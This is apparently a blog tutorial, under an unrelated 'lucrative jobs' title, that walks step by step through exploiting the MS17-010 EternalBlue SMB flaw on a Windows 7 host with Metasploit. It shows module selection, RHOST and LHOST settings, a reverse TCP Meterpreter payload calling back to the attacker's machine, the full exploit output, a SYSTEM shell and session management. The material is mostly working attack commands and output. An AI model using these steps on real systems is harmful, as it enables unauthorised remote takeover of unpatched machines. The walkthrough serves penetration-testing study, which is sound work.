The Most Lucrative Metasploit: Eternalblue Jobs of 2022

The Most Lucrative Metasploit: Eternal blue Jobs of 2022

                   In April 2017, a group calling themselves the Shadow Brokers released a collection of exploit tools that they claimed had been used by the NSA. One of the tools was named Eternal Blue and exploited a vulnerability in Windows SMB. The underlying vulnerability was patched by Microsoft in MS17-010, while the  vulnerabilities themselves are numbered CVE 2017-0143, CVE 2017-0144, CVE 2017-0145, CVE 2017-0146, CVE 2017-0147, and CVE 2017-0148.

Attack: Eternal Blue on Windows 7 SP1

The Metasploit module that exploits this vulnerability is 

  • exploit/windows/smb/ms17_010_eternalblue. 

This Metasploit module affects only 64-bit systems running Windows 7 or
Windows Server 2008 R2. The target system must be configured so that TCP/445 is accessible to the attacker. The related module

  • exploit/windows/smb/ms17_010_eternalblue_win8 affects

Windows 8, 8.1, and 10.

Configuring the Metasploit Internal Database

Metasploit uses a PostgreSQL database to store its data, which is not started by default on Kali.
Though Metasploit can function without its database, it is preferential to have it available. Start the database and ensure that the database starts automatically on subsequent boots with the
following commands.

				
					root@Kali201602:~# systemctl start postgresql
root@Kali201602:~# systemctl enable postgresql
Synchronizing state of postgresql.service with SysV service script with
/lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable postgresql
insserv: warning: current start runlevel(s) (empty) of script `postgresql'
overrides LSB defaults (2 3 4 5).
insserv: warning: current stop runlevel(s) (0 1 2 3 4 5 6) of script `postgresql'
overrides LSB defaults (0 1 6).
root@Kali201602:~# msfdb init
Creating database user 'msf'
Enter password for new role:
Enter it again:
Creating databases 'msf' and 'msf_test'
Creating configuration file in /usr/share/metasploit-framework/config/database.yml
Creating initial database schema

				

These steps only need to be performed once on a Kali system; afterwards the database will be functioning correctly.

Launching Metasploit(Eternalblue)

Start the Metasploit tool msfconsole from the command line by running

				
					root@Kali201602:~# msfconsole -q
msf >
				

Here the -q switch is used with msfconsole to suppress the amusing but large startup banner.
Be patient; it can take a moment or two before the msf > prompt is ready. Once Metasploit is running, verify that the database is running by running the command

				
					msf > db_status
[*] postgresql connected to msf
				

Selecting the Exploit
From Metasploit, select the EternalBlue exploit with the use command.

				
					Notice that the command prompt has changed; now it includes the exploit module as part of
the prompt.
The info command provides the user with information about the chosen exploit.
msf exploit(ms17_010_eternalblue) > info
 Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
 Module: exploit/windows/smb/ms17_010_eternalblue
 Platform: Windows
 Privileged: Yes
 License: Metasploit Framework License (BSD)
 Rank: Average
 Disclosed: 2017-03-14
 ... Output Deleted ...
Available targets:
 Id Name
 -- ----
 0 Windows 7 and Server 2008 R2 (x64) All Service Packs
Basic options:
 Name Current Setting Required Description
 ---- --------------- -------- -----------
 GroomAllocations 12 yes Initial number of times to
 groom the kernel pool.
 GroomDelta 5 yes The amount to increase the
 groom count by per try.
 MaxExploitAttempts 3 yes The number of times to
 retry the exploit.
 ProcessName spoolsv.exe yes Process to inject payload
 into.
 RHOST yes The target address
 RPORT 445 yes The target port (TCP)
 SMBDomain . no (Optional) The Windows
 domain to use for
authentication
 SMBPass no (Optional) The password
 for the specified
username
 SMBUser no (Optional) The username to
 authenticate as
 VerifyArch true yes Check if remote
 architecture matches
exploit Target.
 VerifyTarget true yes Check if remote OS matches
 exploit Target.
Payload information:
 Space: 2000
 Description:
 This module is a port of the Equation Group ETERNALBLUE exploit,
 part of the FuzzBunch toolkit released by Shadow Brokers. There is a
 buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is
 calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error
 where a DWORD is subtracted into a WORD. The kernel pool is groomed
 so that overflow is well laid-out to overwrite an SMBv1 buffer.
 Actual RIP hijack is later completed in
 srvnet!SrvNetWskReceiveComplete. This exploit, like the original may
 not trigger 100% of the time, and should be run continuously until
 triggered. It seems like the pool will get hot streaks and need a
 cool down period before the shells rain in again. The module will
 attempt to use Anonymous login, by default, to authenticate to
 perform the exploit. If the user supplies credentials in the
 SMBUser,SMBPass, and SMBDomain options it will use those instead. On
 some systems, this module may cause system instability and crashes,
 such as a BSOD or a reboot. This may be more likely with some
 payloads.
... Output Deleted ..
				
Setting Options

Before the exploit can be run, the required options need to have values chosen. For this exploit module, the only required option that is initially unset is RHOST; this is the IP address or hostname of the target. Suppose that 10.0.15.210 is the IP address of a 64-bit Windows 7 (SP 1) system that has TCP/445 accessible to the attacker. To target this system, the attacker configures the option in the module with the set command.

				
					msf exploit(ms17_010_eternalblue) > set rhost 10.0.15.210
rhost => 10.0.15.210
				
Choosing the Payload

  Before the attack is launched, the attacker needs to determine what to do if the attack is successful. This is done by selecting a payload. A payload can be code that is run on the remote system, or it can be as simple as a single command. The available payloads for an exploit can be seen with the command show payloads.

				
					msf exploit(ms17_010_eternalblue) > show payloads
Compatible Payloads
===================
 Name Rank Description
 ---- ---- -----------
 generic/custom normal Custom Payload
 generic/shell_bind_tcp normal Generic Command Shell, Bind TCP
 Inline
 generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP
 Inline
 windows/x64/exec normal Windows x64 Execute Command
 windows/x64/loadlibrary normal Windows x64 LoadLibrary Path
...Output Deleted ...
 windows/x64/meterpreter normal Windows Meterpreter
 /reverse_http (Reflective Injection x64), Windows
 x64 Reverse HTTP Stager (wininet)
 windows/x64/meterpreter normal Windows Meterpreter (Reflective
 /reverse_https Injection x64), Windows x64 Reverse
 HTTP Stager (wininet)
 windows/x64/meterpreter normal Windows Meterpreter (Reflective
 /reverse_tcp Injection x64), Windows x64 Reverse
 TCP Stager
... Output Deleted ...
				

         The most commonly used payload is Meterpreter. Meterpreter is a program designed to be run on the target and provides the attacker with a collection of features that allow them to control their target. Meterpreter can be run in many ways; in some, the target system opens a port and waits for the attacker to connect to that port. Because this approach is easily stopped by firewalls, the usual approach is a reverse shell. In this case, the target system calls back to the attacking system; this can be done over HTTP, HTTPS, or over a custom TCP port. In this example, the attacker elects to use Meterpreter calling back over TCP

				
					msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
				

Once the payload is selected, additional options may need to be configured. The command options lists the currently selected options for the exploit.

				
					msf exploit(ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):
 Name Current Setting Required Description
 ---- --------------- -------- -----------
 GroomAllocations 12 yes Initial number of times to
 groom the kernel pool.
 GroomDelta 5 yes The amount to increase the
 groom count by per try.
 MaxExploitAttempts 3 yes The number of times to
 retry the exploit.
 ProcessName spoolsv.exe yes Process to inject payload
 into.
 RHOST 10.0.15.210 yes The target address
 RPORT 445 yes The target port (TCP)
 SMBDomain . no (Optional) The Windows
 domain to use for
authentication
 SMBPass no (Optional) The password for
 the specified username
 SMBUser no (Optional) The username to
 authenticate as
 VerifyArch true yes Check if remote
 architecture matches
exploit Target.
 VerifyTarget true yes Check if remote OS matches
 exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
 Name Current Setting Required Description
 ---- --------------- -------- -----------
 EXITFUNC thread yes Exit technique (Accepted: '', seh,
 thread, process, none)
 LHOST yes The listen address
 LPORT 4444 yes The listen port
Exploit target:
 Id Name
 -- ----
 0 Windows 7 and Server 2008 R2 (x64) All Service Packs
				

            In this case, the required option, LHOST, still needs to be set. This is the address of the system that the attacker will call back to. The simplest value here is the IP address of the Kali system that is being used to launch the attack. In this case, when the attack is launched, Metasploit will automatically configure a listener to handle the callback from the target

				
					msf exploit(ms17_010_eternalblue) > set lhost 10.0.2.2
lhost => 10.0.2.2
				
				
					Note that the variable names in Metasploit are not case sensitive
				

Launching the Exploit

With the required options selected, the exploit can be launched with the command exploit or the command run

				
					msf exploit(ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.0.2.2:4444
[*] 10.0.15.210:445 - Connecting to target for exploitation.
[+] 10.0.15.210:445 - Connection established for exploitation.
[+] 10.0.15.210:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.0.15.210:445 - CORE raw buffer dump (42 bytes)
[*] 10.0.15.210:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65
73 Windows 7 Profes
[*] 10.0.15.210:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72
76 sional 7601 Serv
[*] 10.0.15.210:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.0.15.210:445 - Target arch selected valid for arch indicated by DCE/RPC
reply
[*] 10.0.15.210:445 - Trying exploit with 12 Groom Allocations.
[*] 10.0.15.210:445 - Sending all but last fragment of exploit packet
[*] 10.0.15.210:445 - Starting non-paged pool grooming
[+] 10.0.15.210:445 - Sending SMBv2 buffers
[+] 10.0.15.210:445 - Closing SMBv1 connection creating free hole adjacent to
SMBv2 buffer.
[*] 10.0.15.210:445 - Sending final SMBv2 buffers.
[*] 10.0.15.210:445 - Sending last fragment of exploit packet!
[*] 10.0.15.210:445 - Receiving response from exploit packet
[+] 10.0.15.210:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.0.15.210:445 - Sending egg to corrupted connection.
[*] 10.0.15.210:445 - Triggering free of corrupted buffer.
[*] Sending stage (1188415 bytes) to 10.0.15.210
[*] Meterpreter session 1 opened (10.0.2.2:4444 -> 10.0.15.210:62487) at 2017-08-20
14:07:25 -0400
[+] 10.0.15.210:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[+] 10.0.15.210:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-
[+] 10.0.15.210:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
meterpreter >
				

       If the exploit reports that the connection timed out, this is often caused by a firewall on the target. For the purposes of testing the exploit, consider disabling the firewall on the Windows target

Interacting with Meterpreter

     The change in the command prompt shows that the attacker is now interacting with Meterpreter running on the remote system. The attacker can then issue commands and have them run on the remote system. To determine basic information about the system, the Meterpreter command sys info can be used.

				
					meterpreter > sysinfo
Computer : EDGEWORTH
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : PLUTO
Logged On Users : 2
Meterpreter : x64/windows
To determine the user ID that is being used to run Meterpreter, the command getuid
can be used.
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
This exploit escalates privileges to SYSTEM on the target, but this is quite unusual; most
exploits simply provide access to the target and other exploits or techniques are needed before
gaining SYSTEM.
The attacker can interact with a traditional command prompt on the remote target by issuing
the shell command.
meterpreter > shell
Process 1816 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:Windowssystem32>
To exit the shell and return to Meterpreter, press CTRL+Z.
C:Windowssystem32>^Z
Background channel 1? [y/N] y
				

Metasploit Sessions

When the attacker is done interacting with this target, they can use the background command.

				
					meterpreter > background
[*] Backgrounding session 1...
msf exploit(ms17_010_eternalblue) >
The attacker is now interacting with Metasploit rather than with the instance of Meterpreter
that has been deployed on the target at 10.0.15.210.
Metasploit can manage multiple sessions. To see the currently running sessions, the attacker
can use the sessions command. The command help sessions shows some of the options to the
sessions command.
msf exploit(ms17_010_eternalblue) > sessions
Active sessions
===============
 Id Type Information Connection
 -- ---- ----------- ----------
 1 meterpreter x64/windows NT AUTHORITYSYSTEM @ EDGEWORTH 10.0.2.2:4444 ->
10.0.15.210:62487 (10.0.15.210)
msf exploit(ms17_010_eternalblue) > help sessions
Usage: sessions [options] or sessions [id]
Active session manipulation and interaction.
OPTIONS:
 -C <opt> Run a Meterpreter Command on the session given with -i, or
 all
 -K Terminate all sessions
 -S <opt> Row search filter.
 -c <opt> Run a command on the session given with -i, or all
 -h Help banner
 -i <opt> Interact with the supplied session ID
 -k <opt> Terminate sessions by session ID and/or range
 -l List all active sessions
 -q Quiet mode
 -r Reset the ring buffer for the session given with -i, or all
 -s <opt> Run a script on the session given with -i, or all
 -t <opt> Set a response timeout (default: 15)
 -u <opt> Upgrade a shell to a meterpreter session on many platforms
 -v List sessions in verbose mode
 -x Show extended information in the session table
Many options allow specifying session ranges using commas and dashes.
For example: sessions -s checkvm -i 1,3-5 or sessions -k 1-2,5,6
If the attacker wishes to continue interacting with the session established with 10.0.15.210,
they can return to the Meterpreter command prompt with
msf exploit(ms17_010_eternalblue) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
				

Exiting Metasploit

    If the attacker has finished their work with Metasploit entirely, then from the Metasploit command prompt they can issue the command exit. If Metasploit currently has established sessions with remote systems, the attacker needs to confirm the request to exit.

				
					meterpreter > background
[*] Backgrounding session 1...
msf exploit(ms17_010_eternalblue) > exit
[*] You have active sessions open, to exit anyway type "exit -y"
msf exploit(ms17_010_eternalblue) > exit -y
root@kali-2016-2-u:~#
				

Thanks

Leave a Comment

Leave a Reply

Your email address will not be published.